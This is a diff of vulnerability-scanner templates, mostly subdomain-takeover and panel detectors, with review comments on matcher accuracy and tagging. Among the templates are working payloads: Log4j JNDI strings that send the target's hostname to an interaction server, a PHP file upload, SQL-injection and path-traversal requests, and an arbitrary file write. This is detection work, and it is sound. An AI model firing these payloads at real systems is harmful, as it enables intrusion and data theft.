diff --git a/poc/subdomain_takeover/flywheel-takeover.yaml b/poc/subdomain_takeover/flywheel-takeover.yaml index 5cd4e2de15..48e5459959 100644 --- a/poc/subdomain_takeover/flywheel-takeover.yaml +++ b/poc/subdomain_takeover/flywheel-takeover.yaml @@ -1,10 +1,12 @@ id: flywheel-takeover + info: name: Flywheel Subdomain Takeover author: smaranchand severity: high tags: takeover reference: https://smaranchand.com.np/2021/06/flywheel-subdomain-takeover + requests: - method: GET path: diff --git a/poc/subdomain_takeover/ghost-takeover-7622.yaml b/poc/subdomain_takeover/ghost-takeover-7622.yaml index 6f529c2709..453169d21f 100644 --- a/poc/subdomain_takeover/ghost-takeover-7622.yaml +++ b/poc/subdomain_takeover/ghost-takeover-7622.yaml @@ -1,19 +1,21 @@ id: ghost-takeover - info: name: ghost takeover detection author: pdteam severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/89 + tags: takeover,ghost requests: - method: GET path: - "{{BaseURL}}" - + matchers-condition: and matchers: - type: word + part: header words: - - The thing you were looking for is no longer here - - The thing you were looking for is no longer here, or never was \ No newline at end of file + - 'offline.ghost.org' + - type: status + status: + - 302 diff --git a/poc/subdomain_takeover/helpjuice-takeover.yaml b/poc/subdomain_takeover/helpjuice-takeover.yaml index c5ab27ce89..77a0d626fd 100644 --- a/poc/subdomain_takeover/helpjuice-takeover.yaml +++ b/poc/subdomain_takeover/helpjuice-takeover.yaml @@ -1,18 +1,15 @@ id: helpjuice-takeover - info: name: helpjuice takeover detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - We could not find what you're looking for. \ No newline at end of file + - We could not find what you're looking for. 
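Review bot: The replacement matcher in ghost-takeover accepts the string `offline.ghost.org` in any response header alongside a 302, whereas the signal it is presumably after is the redirect target. Pinning the check to the `Location` header would make this `severity: high` finding harder to trigger by accident, for example a `type: regex` matcher on `part: header` with `'(?mi)^location:.*offline\.ghost\.org'`. The body strings that were removed could be kept as a comment recording the older fingerprint, so a later maintainer can see why the detection changed.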
diff --git a/poc/subdomain_takeover/helpscout-takeover-7934.yaml b/poc/subdomain_takeover/helpscout-takeover-7934.yaml index 899cf00fe0..548f39f325 100644 --- a/poc/subdomain_takeover/helpscout-takeover-7934.yaml +++ b/poc/subdomain_takeover/helpscout-takeover-7934.yaml @@ -1,16 +1,19 @@ id: helpscout-takeover + info: name: helpscout takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: + - type: word words: - - "No settings were found for this company:" + - "No settings were found for this company:" \ No newline at end of file diff --git a/poc/subdomain_takeover/jazzhr-takeover-8235.yaml b/poc/subdomain_takeover/jazzhr-takeover-8235.yaml index d8f20df0d2..cc2e8d6a32 100644 --- a/poc/subdomain_takeover/jazzhr-takeover-8235.yaml +++ b/poc/subdomain_takeover/jazzhr-takeover-8235.yaml @@ -1,15 +1,18 @@ id: jazzhr-takeover + info: name: jazzhr takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - This account no longer active + - This account no longer active \ No newline at end of file diff --git a/poc/subdomain_takeover/landingi-takeover-8566.yaml b/poc/subdomain_takeover/landingi-takeover-8566.yaml index 71ebf119b4..918c30fb6a 100644 --- a/poc/subdomain_takeover/landingi-takeover-8566.yaml +++ b/poc/subdomain_takeover/landingi-takeover-8566.yaml @@ -1,7 +1,7 @@ id: landingi-takeover info: name: landingi takeover detection - author: pdteam + author: pdcommunity severity: info tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 
diff --git a/poc/subdomain_takeover/launchrock-takeover-8603.yaml b/poc/subdomain_takeover/launchrock-takeover-8603.yaml index 0dfea4d37b..b81478b063 100644 --- a/poc/subdomain_takeover/launchrock-takeover-8603.yaml +++ b/poc/subdomain_takeover/launchrock-takeover-8603.yaml @@ -1,15 +1,18 @@ id: launchrock-takeover + info: name: launchrock takeover detection author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. + - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us. \ No newline at end of file diff --git a/poc/subdomain_takeover/netlify-takeover-9042.yaml b/poc/subdomain_takeover/netlify-takeover-9042.yaml index 17ceeb0180..973635bbcd 100644 --- a/poc/subdomain_takeover/netlify-takeover-9042.yaml +++ b/poc/subdomain_takeover/netlify-takeover-9042.yaml @@ -1,11 +1,10 @@ id: netlify-takeover info: name: netlify takeover detection - author: 0xPrial,pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz - tags: takeover,netlify + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: @@ -14,8 +13,8 @@ requests: matchers: - type: word words: - - "Not found - Request ID:" + - "Not Found" - type: word words: - - "Netlify" + - "server: Netlify" part: header diff --git a/poc/subdomain_takeover/pantheon-takeover-9461.yaml b/poc/subdomain_takeover/pantheon-takeover-9461.yaml index 2f9438c074..a029691e60 100644 --- a/poc/subdomain_takeover/pantheon-takeover-9461.yaml +++ b/poc/subdomain_takeover/pantheon-takeover-9461.yaml 
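Review bot: The body matcher in the second hunk of netlify-takeover is loosened from `"Not found - Request ID:"` to `"Not Found"`, text that any ordinary 404 page can contain, so a claimed Netlify site that simply answers 404 on `/` would satisfy it together with the header match. The header word also becomes `"server: Netlify"`; word matchers compare case-sensitively unless `case-insensitive: true` is set, so whether it ever matches depends on how the header name is cased in the dumped response. For a `severity: high` takeover result I would keep the specific body string and add `case-insensitive: true` to the header matcher. The `matchers-condition` line sits outside the hunk, so the two matchers are assumed to be joined by `and`.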
@@ -1,18 +1,15 @@ id: pantheon-takeover - info: name: pantheon takeover detection - author: pdteam + author: pdcommunity severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz - requests: - method: GET path: - "{{BaseURL}}" - matchers: - type: word words: - - "The gods are wise, but do not know of the site which you seek." \ No newline at end of file + - "The gods are wise, but do not know of the site which you seek." diff --git a/poc/subdomain_takeover/pingdom-takeover-9587.yaml b/poc/subdomain_takeover/pingdom-takeover-9587.yaml index cc6932ebff..fcc211e1b0 100644 --- a/poc/subdomain_takeover/pingdom-takeover-9587.yaml +++ b/poc/subdomain_takeover/pingdom-takeover-9587.yaml @@ -1,17 +1,19 @@ id: pingdom-takeover + info: name: pingdom takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - Public Report Not Activated - - This public report page has not been activated by the user + - This public report page has not been activated by the user \ No newline at end of file diff --git a/poc/subdomain_takeover/proposify-takeover-9693.yaml b/poc/subdomain_takeover/proposify-takeover-9693.yaml index 72fcf7d484..2312d7cb42 100644 --- a/poc/subdomain_takeover/proposify-takeover-9693.yaml +++ b/poc/subdomain_takeover/proposify-takeover-9693.yaml @@ -1,11 +1,10 @@ id: proposify-takeover info: name: proposify takeover detection - author: pdteam + author: pdcommunity severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/readme-takeover-9842.yaml b/poc/subdomain_takeover/readme-takeover-9842.yaml index f105be275a..942af6ab47 100644 
--- a/poc/subdomain_takeover/readme-takeover-9842.yaml +++ b/poc/subdomain_takeover/readme-takeover-9842.yaml @@ -1,15 +1,18 @@ id: readme-takeover + info: name: readme takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - Project doesnt exist... yet! + - 'Project doesnt exist... yet!' diff --git a/poc/subdomain_takeover/s3-subtakeover.yaml b/poc/subdomain_takeover/s3-subtakeover.yaml index 9b5790b840..6ada628d08 100644 --- a/poc/subdomain_takeover/s3-subtakeover.yaml +++ b/poc/subdomain_takeover/s3-subtakeover.yaml @@ -1,9 +1,13 @@ id: s3-subtakeover + info: name: Subdomain takeovee AWS S3 author: manikanta a.k.a @secureitmania severity: high + # Source:- https://link.medium.com/fgXKJHR9P7 + + requests: - method: GET path: diff --git a/poc/subdomain_takeover/shopify-takeover-10204.yaml b/poc/subdomain_takeover/shopify-takeover-10204.yaml index e3cd175309..e657c6388f 100644 --- a/poc/subdomain_takeover/shopify-takeover-10204.yaml +++ b/poc/subdomain_takeover/shopify-takeover-10204.yaml @@ -1,7 +1,7 @@ id: shopify-takeover info: name: shopify takeover detection - author: pdcommunity + author: pdteam,philippedelteil severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz @@ -9,8 +9,18 @@ requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word words: - - "Sorry, this shop is currently unavailable." - 'To finish setting up your new web address, go to your domain settings, click "Connect existing domain"' + - "Sorry, this shop is currently unavailable." + condition: or + - type: word + words: + - 'shop-not-found' + - type: dsl + dsl: + - '!contains(host,"myshopify.com")' + - '!contains(host,"shopify.com")' + condition: and 
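Review bot: In the `dsl` matcher added to shopify-takeover the first expression is redundant, because every host that contains `myshopify.com` also contains `shopify.com`, so `!contains(host,"shopify.com")` alone decides the outcome. Since `contains` is a substring test, it also suppresses results for unrelated hosts that merely embed the string (constructed example: `shopify.com.example.org`), which is a missed finding for a takeover check. I would drop the `myshopify.com` line and compare the end of the host rather than any substring. The two `word` matchers are now joined by `and`, so a page must show one of the banner sentences and `shop-not-found`; a comment stating that both appear together on an unclaimed shop page would document why.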
diff --git a/poc/subdomain_takeover/tave-takeover-10661.yaml b/poc/subdomain_takeover/tave-takeover-10661.yaml index 8f17507fe9..856340b2cf 100644 --- a/poc/subdomain_takeover/tave-takeover-10661.yaml +++ b/poc/subdomain_takeover/tave-takeover-10661.yaml @@ -1,15 +1,18 @@ id: tave-takeover + info: name: tave takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - - "

Error 404: Page Not Found

" + - "

Error 404: Page Not Found

" \ No newline at end of file diff --git a/poc/subdomain_takeover/urge-takeover.yaml b/poc/subdomain_takeover/urge-takeover.yaml index 6cc4e1e8b1..a5fcc3e6f9 100644 --- a/poc/subdomain_takeover/urge-takeover.yaml +++ b/poc/subdomain_takeover/urge-takeover.yaml @@ -3,9 +3,8 @@ info: name: surge takeover detection author: pdteam severity: high - reference: - - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: diff --git a/poc/subdomain_takeover/webflow-takeover.yaml b/poc/subdomain_takeover/webflow-takeover.yaml index 3fd3180be6..da17c4a95f 100644 --- a/poc/subdomain_takeover/webflow-takeover.yaml +++ b/poc/subdomain_takeover/webflow-takeover.yaml @@ -1,15 +1,18 @@ id: webflow-takeover + info: name: webflow takeover detection - author: pdcommunity + author: pdteam severity: high tags: takeover reference: https://github.com/EdOverflow/can-i-take-over-xyz + requests: - method: GET path: - "{{BaseURL}}" + matchers: - type: word words: - -

The page you are looking for doesn't exist or has been moved.

+ -

The page you are looking for doesn't exist or has been moved.

\ No newline at end of file diff --git a/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml b/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml index cc1d3a4837..2d962b0a96 100644 --- a/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml +++ b/poc/template_injection/pdf-signer-ssti-to-rce-9472.yaml @@ -1,11 +1,8 @@ id: pdf-signer-ssti-to-rce - info: name: PDF Signer v3.0 - SSTI to RCE via CSRF Cookie author: madrobot severity: high - description: todo - requests: - method: GET path: diff --git a/poc/template_injection/twig-php-ssti.yaml b/poc/template_injection/twig-php-ssti.yaml index f8e8e26d35..d21ecf6b44 100644 --- a/poc/template_injection/twig-php-ssti.yaml +++ b/poc/template_injection/twig-php-ssti.yaml @@ -1,9 +1,10 @@ id: twig-php-ssti + info: name: Twig PHP <2.4.4 template engine - SSTI author: madrobot severity: high - tags: php,ssti + requests: - method: GET path: diff --git a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml index 4e7ede529c..aa02a4941d 100644 --- a/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml +++ b/poc/upload/ecology_E-Office_Uploadify_FileUpload.yaml 
@@ -1,29 +1,52 @@ id: FanWei - info: - name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability + name: FanWei Micro OA E-Office upload.php Arbitrary File Upload Vulnerability author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information- + FanWei E-Office uploads files in upload.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability metadata: - fofa-query: app="泛微-协同办公OA" - hunter-query: web.title="泛微-协同办公OA" + fofa-query: app="泛微-EOffice" + hunter-query: web.title="泛微软件" + +variables: + str1: '{{rand_base(6)}}' + str2: '{{rand_base(6)}}' http: - raw: - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) - Accept-Encoding: gzip, deflate - Connection: close + POST /webservice/upload.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryakbyiukl + Accept-Encoding: gzip + Connection: close + + ------WebKitFormBoundaryakbyiukl + Content-Disposition: form-data; name="file"; filename="a.php4" + Content-Type: application/octet-stream + + + ------WebKitFormBoundaryakbyiukl-- + + - | + GET /attachment/{{replace(name,"*","/")}}.php4 HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: name + group: 1 + regex: + - '([/*0-9a-zA-Z]+)\.php4$' + internal: true - req-condition: true matchers: - type: dsl dsl: - - 'contains(body_1, "c4ca")' - condition: and + - body_2 == str2 + +# 
http://your-ip/attachment/回显的那串数字/a.php4 diff --git a/poc/upload/showdoc-file-upload-rce-10226.yaml b/poc/upload/showdoc-file-upload-rce-10226.yaml index 574d070ebd..2cfcddd5ab 100644 --- a/poc/upload/showdoc-file-upload-rce-10226.yaml +++ b/poc/upload/showdoc-file-upload-rce-10226.yaml @@ -1,12 +1,11 @@ id: showdoc-file-upload-rce - info: name: Showdoc < 2.8.6 File Upload RCE author: pikpikcu severity: critical - reference: https://github.com/star7th/showdoc/pull/1059 + reference: + - https://github.com/star7th/showdoc/pull/1059 tags: rce,fileupload,showdoc - requests: - raw: - | @@ -20,7 +19,6 @@ requests: ----------------------------835846770881083140190633-- - matchers-condition: and matchers: - type: word @@ -28,12 +26,10 @@ requests: - '"url":"http:' - '"success":1' condition: and - - type: status status: - 200 - extractors: - type: json json: - - '.url' \ No newline at end of file + - '.url' diff --git a/poc/upload/zhiyuan-file-upload-11791.yaml b/poc/upload/zhiyuan-file-upload-11791.yaml index 8338a13426..4057d76160 100644 --- a/poc/upload/zhiyuan-file-upload-11791.yaml +++ b/poc/upload/zhiyuan-file-upload-11791.yaml 
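Review bot: The rewritten E-Office template has no `tags:` line at all, although its first request uploads `a.php4` to the scanned host and nothing removes the file afterwards, so it cannot be excluded from non-intrusive scans; I would add at least `tags: fileupload,intrusive`. As shown in this hunk the multipart part carries no content, `str1` is never used, and the matcher `body_2 == str2` compares against a value that is not visibly sent, so the check looks unable to succeed (the payload line may have been lost when the page was rendered, so confirm against the file). The `id: FanWei` is kept from the SQL-injection template this file used to hold and no longer says what is tested. An id naming the product and the upload endpoint would keep results distinguishable.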
@@ -1,24 +1,33 @@ id: zhiyuan-file-upload + info: - name: Zhiyuan OA arbitrary file upload vulnerability + name: Zhiyuan OA Arbitrary File Upload Vulnerability author: gy741 severity: critical - description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server which they can later access and cause their code to be executed. - reference: https://www.programmersought.com/article/92658169875/ + description: A vulnerability in Zhiyuan OA allows remote unauthenticated attackers to upload arbitrary files to the remote server and cause execute arbitrary code to be executed. + reference: + - https://www.programmersought.com/article/92658169875/ + remediation: Apply the appropriate patch. tags: zhiyuan,rce,upload + requests: - method: GET path: - "{{BaseURL}}/seeyon/thirdpartyController.do.css/..;/ajax.do" + matchers-condition: and matchers: - type: word words: - "java.lang.NullPointerException:null" + - type: word words: - "text/html" part: header + - type: status status: - 200 + +# Enhanced by mp on 2022/02/04 diff --git a/poc/vmware/vmware-horizon-11038.yaml b/poc/vmware/vmware-horizon-11038.yaml index 4627d13031..3c4c7f59a2 100644 --- a/poc/vmware/vmware-horizon-11038.yaml +++ b/poc/vmware/vmware-horizon-11038.yaml @@ -1,21 +1,22 @@ id: vmware-horizon + info: name: VMware Horizon Login author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/6496 tags: panel + requests: - method: GET path: - '{{BaseURL}}/portal/webclient/index.html' - matchers-condition: or + + matchers-condition: and matchers: - type: word - part: body words: - 'VMware Horizon' - - type: regex - part: body - regex: - - '(?m)^Missing route token in request$' + - type: status + status: + - 200 diff --git a/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml b/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml index dc7b93f6b8..d18b8d642c 100644 --- a/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml 
+++ b/poc/vmware/vmware-horizon-log4j-jndi-rce.yaml @@ -1,43 +1,32 @@ id: vmware-horizon-log4j-jndi-rce - info: name: VMware Horizon Log4j JNDI RCE author: johnk3r - severity: critical - description: | - A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon. + severity: high + description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware Horizon. reference: - https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis - https://www.vmware.com/security/advisories/VMSA-2021-0028.html - - https://logging.apache.org/log4j/2.x/security.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 - metadata: - verified: true - shodan-query: http.html:"VMware Horizon" - tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast - + tags: rce,jndi,log4j,horizon,vmware requests: - raw: - | GET /portal/info.jsp HTTP/1.1 Host: {{Hostname}} Accept-Language: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} - matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the DNS Interaction + part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - - type: regex part: interactsh_request regex: - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable - extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/vmware/vmware-horizon-panel-11035.yaml b/poc/vmware/vmware-horizon-panel-11035.yaml index 596ebf0e7b..e4fda4b734 100644 --- a/poc/vmware/vmware-horizon-panel-11035.yaml +++ b/poc/vmware/vmware-horizon-panel-11035.yaml 
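Review bot: `severity` is lowered from `critical` to `high` in vmware-horizon-log4j-jndi-rce while the retained description still calls CVE-2021-44228 "a critical vulnerability", and the vCenter template for the same CVE is raised to `critical` later in this patch, so the two Log4j templates end up disagreeing. The hunk also removes `cve,cve2021` and `oast` from `tags` and deletes the NVD and Apache references, which makes the template harder to select by CVE and hides that it depends on an out-of-band interaction server. I would keep `severity: critical` and `tags: cve,cve2021,rce,jndi,log4j,horizon,vmware,oast`.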
@@ -4,8 +4,7 @@ info: name: VMware Horizon Login author: dhiyaneshDK severity: info - reference: - - https://www.exploit-db.com/ghdb/6496 + reference: https://www.exploit-db.com/ghdb/6496 tags: panel,horizon,vmware requests: diff --git a/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml b/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml index ef7fc32df9..be1fbe33ea 100644 --- a/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml +++ b/poc/vmware/vmware-vcenter-log4j-jndi-rce.yaml 
@@ -1,42 +1,38 @@ id: vmware-vcenter-log4j-jndi-rce - info: name: VMware VCenter Log4j JNDI RCE author: _0xf4n9x_ - severity: high - description: A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter. + severity: critical + description: | + A critical vulnerability in Apache Log4j identified by CVE-2021-44228 has been publicly disclosed that may allow for remote code execution in impacted VMware VCenter. reference: - - https://twitter.com/tnpitsecurity/status/1469429810216771589 - https://www.vmware.com/security/advisories/VMSA-2021-0028.html - tags: rce,jndi,log4shell,log4j,vcenter - + - https://github.com/advisories/GHSA-jfh8-c2jp-5v3q + - https://twitter.com/tnpitsecurity/status/1469429810216771589 + - https://logging.apache.org/log4j/2.x/security.html + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + metadata: + shodan-query: title:"VMware VCenter" + tags: cve,cve2021,rce,jndi,log4j,vcenter,vmware,oast requests: - raw: - | GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:95.0) Gecko/20100101 Firefox/95.0 X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{{interactsh-url}}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 - Upgrade-Insecure-Requests: 1 - + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable extractors: - type: regex part: interactsh_request group: 1 regex: - - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.interactsh\.com' # Extract ${hostName} - - matchers-condition: or - matchers: - - type: word - part: interactsh_protocol - name: http - words: - - "http" - - - type: word 
- part: interactsh_protocol - name: dns - words: - - "dns" + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output diff --git a/poc/vmware/vmware-vcenter-ssrf.yaml b/poc/vmware/vmware-vcenter-ssrf.yaml index 4bd82a9b23..a842c409e1 100644 --- a/poc/vmware/vmware-vcenter-ssrf.yaml +++ b/poc/vmware/vmware-vcenter-ssrf.yaml @@ -1,24 +1,21 @@ id: vmware-vcenter-ssrf - info: name: VMware vCenter SSRF/LFI/XSS author: pdteam severity: critical - reference: https://github.com/l0ggg/VMware_vCenter + reference: + - https://github.com/l0ggg/VMware_vCenter tags: ssrf,lfi,xss,oast,vcenter,vmware - requests: - method: GET path: - "{{BaseURL}}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://{{interactsh-url}}" - matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - - type: status status: - 200 diff --git a/poc/web/axigen-webadmin.yaml b/poc/web/axigen-webadmin.yaml index 0e54704559..515f319cbe 100644 --- a/poc/web/axigen-webadmin.yaml +++ b/poc/web/axigen-webadmin.yaml @@ -7,14 +7,11 @@ info: description: An Axigen Web Admin panel was discovered. reference: - https://www.axigen.com/ - metadata: - shodan-query: 'http.title:"Axigen WebAdmin"' - tags: axigen,panel classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Axigen WebAdmin" + tags: axigen,panel requests: - method: GET diff --git a/poc/web/azkaban-web-client-676.yaml b/poc/web/azkaban-web-client-676.yaml index e02686810a..c939d27836 100644 --- a/poc/web/azkaban-web-client-676.yaml +++ b/poc/web/azkaban-web-client-676.yaml 
@@ -4,7 +4,13 @@ info: name: Azkaban Web Client author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22 + description: An Azkaban web client panel was discovered. + reference: + - https://azkaban.github.io/ + classification: + cwe-id: CWE-200 + metadata: + shodan-query: http.title:"Azkaban Web Client" tags: panel,azkaban requests: @@ -20,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/web/cobbler-webgui-1124.yaml b/poc/web/cobbler-webgui-1124.yaml index 00ce480dcc..abd7d4d1bc 100644 --- a/poc/web/cobbler-webgui-1124.yaml +++ b/poc/web/cobbler-webgui-1124.yaml @@ -3,8 +3,8 @@ id: cobbler-webgui info: name: Cobbler WebGUI Detection author: c-sh0 - severity: info description: Detection of Cobbler WebGUI + severity: info metadata: shodan-query: http.title:"Cobbler Web Interface" tags: cobbler,webserver,panel diff --git a/poc/web/dixell-xweb500-filewrite-7020.yaml b/poc/web/dixell-xweb500-filewrite-7020.yaml index 445c9333ac..4fe7c476db 100644 --- a/poc/web/dixell-xweb500-filewrite-7020.yaml +++ b/poc/web/dixell-xweb500-filewrite-7020.yaml 
@@ -1,17 +1,12 @@ id: dixell-xweb500-filewrite - info: - name: Emerson Dixell XWEB-500 - Arbitrary File Write + name: Dixell XWEB-500 - Arbitrary File Write author: hackerarpan severity: critical - description: Emerson Dixell XWEB-500 products are affected by arbitrary file write vulnerabilities in /cgi-bin/logo_extra_upload.cgi, /cgi-bin/cal_save.cgi, and /cgi-bin/lo_utils.cgi. An attacker will be able to write any file on the target system without any kind of authentication mechanism, and this can lead to denial of service and potentially remote code execution. Note that this product has not been supported since 2018 and should be removed or replaced. - reference: - - https://www.exploit-db.com/exploits/50639 - - https://nvd.nist.gov/vuln/detail/CVE-2021-45420 + reference: https://www.exploit-db.com/exploits/50639 metadata: - google-query: inurl:"xweb500.cgi" - tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive - + google-dork: inurl:"xweb500.cgi" + tags: lfw,iot,dixell,xweb500 requests: - raw: - | @@ -21,20 +16,15 @@ requests: {{randstr}}.txt dixell-xweb500-filewrite - - | GET /logo/{{randstr}}.txt HTTP/1.1 Host: {{Hostname}} - req-condition: true matchers-condition: and matchers: - type: dsl dsl: - 'contains(body_2, "dixell-xweb500-filewrite")' - - type: status status: - 200 - -# Enhanced by mp on 2022/06/01 diff --git a/poc/web/ewebs-arbitrary-file-reading-7273.yaml b/poc/web/ewebs-arbitrary-file-reading-7273.yaml index f69dddd216..4c913e55aa 100644 --- a/poc/web/ewebs-arbitrary-file-reading-7273.yaml +++ b/poc/web/ewebs-arbitrary-file-reading-7273.yaml @@ -1,4 +1,5 @@ id: ewebs-arbitrary-file-reading + info: name: EWEBS - Local File Inclusion author: pikpikcu 
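Review bot: The new `tags` line of dixell-xweb500-filewrite drops `intrusive` (and `fileupload`, `edb`) although the second hunk shows the template still writing `{{randstr}}.txt` and then fetching it from `/logo/`, so scans configured to skip intrusive templates will now perform a file write on every target. The first hunk also deletes the description with its end-of-support notice and the CVE-2021-45420 NVD reference, leaving operators no guidance on what a hit means. I would keep `tags: lfw,iot,dixell,xweb500,edb,fileupload,intrusive` and the removed `description`. The request that performs the write lies between the two hunks and is not visible here.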
@@ -11,13 +12,18 @@ info: cvss-score: 7.5 cwe-id: CWE-22 tags: ewebs,lfi -requests: + metadata: + max-request: 1 + +http: - method: POST path: - '{{BaseURL}}/casmain.xgi' headers: Content-Type: application/x-www-form-urlencoded + body: "Language_S=../../Data/CONFIG/CasDbCnn.dat" + matchers-condition: and matchers: - type: word @@ -26,6 +32,7 @@ requests: - "[LocalInfo]" condition: and part: body + - type: status status: - 200 diff --git a/poc/web/fingerprinthub-web-fingerprints-7480.yaml b/poc/web/fingerprinthub-web-fingerprints-7480.yaml old mode 100755 new mode 100644 index ca2ef4cc89..e9c7fdd205 --- a/poc/web/fingerprinthub-web-fingerprints-7480.yaml +++ b/poc/web/fingerprinthub-web-fingerprints-7480.yaml @@ -2,23 +2,21 @@ id: fingerprinthub-web-fingerprints info: name: FingerprintHub Technology Fingerprint - author: pdteam,righettod + author: pdteam severity: info description: FingerprintHub Technology Fingerprint tests run in nuclei. reference: - https://github.com/0x727/FingerprintHub classification: cwe-id: CWE-200 - metadata: - max-request: 1 tags: tech -http: +requests: - method: GET path: - "{{BaseURL}}" - host-redirects: true + redirects: true max-redirects: 2 matchers-condition: or @@ -717,16 +715,14 @@ http: - axis2-admin - axis2-web - - type: word - name: apache-druid - words: - - content="Apache Druid console" - - type: word part: header name: apache-cocoon + + - type: word + name: apache-druid words: - - "X-Cocoon-Version" + - content="Apache Druid console" - type: word name: 